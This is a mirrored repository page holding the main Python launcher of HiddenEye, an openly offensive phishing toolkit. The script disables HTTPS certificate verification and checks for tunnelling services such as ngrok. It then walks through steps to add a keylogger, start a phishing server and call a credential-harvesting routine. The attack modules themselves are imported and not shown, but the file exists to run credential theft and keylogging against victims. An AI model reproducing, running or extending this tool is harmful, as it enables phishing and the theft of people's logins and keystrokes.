mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
cfac68c0a9
* Fixing Settings.ini * Update .gitignore * Refactoring Code * Refactoring/Formatting Code
55 lines
1.2 KiB
Python
Executable File
55 lines
1.2 KiB
Python
Executable File
#!/usr/bin/python3
|
|
#
|
|
# HiddenEye by https://github.com/DarkSecDevelopers
|
|
#
|
|
|
|
from Defs.Languages import *
|
|
from Defs.Actions import *
|
|
from Defs.Configurations import *
|
|
from Defs.Checks import *
|
|
import multiprocessing
|
|
import gettext
|
|
import sys
|
|
import ssl
|
|
from os import system, environ
|
|
|
|
if(not environ.get('PYTHONHTTPSVERIFY', "") and getattr(ssl, '_create_unverified_context', None)):
|
|
ssl._create_default_https_context = ssl._create_unverified_context
|
|
|
|
|
|
RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m'
|
|
checkPermissions()
|
|
installGetText()
|
|
languageSelector()
|
|
checkConnection()
|
|
checkLocalxpose()
|
|
checkNgrok()
|
|
checkbinaryLT()
|
|
checkLT()
|
|
ifSettingsNotExists()
|
|
readConfig()
|
|
|
|
|
|
if __name__ == "__main__":
|
|
try:
|
|
runMainMenu()
|
|
mainMenu()
|
|
|
|
keyloggerprompt()
|
|
addingkeylogger()
|
|
cloudfarePrompt()
|
|
emailPrompt()
|
|
inputCustom()
|
|
port = selectPort()
|
|
|
|
##############
|
|
runServer(port)
|
|
selectServer(port)
|
|
|
|
multiprocessing.Process(target=runServer, args=(port,)).start()
|
|
getCredentials(port)
|
|
|
|
except KeyboardInterrupt:
|
|
emailPrompt3()
|
|
exit()
|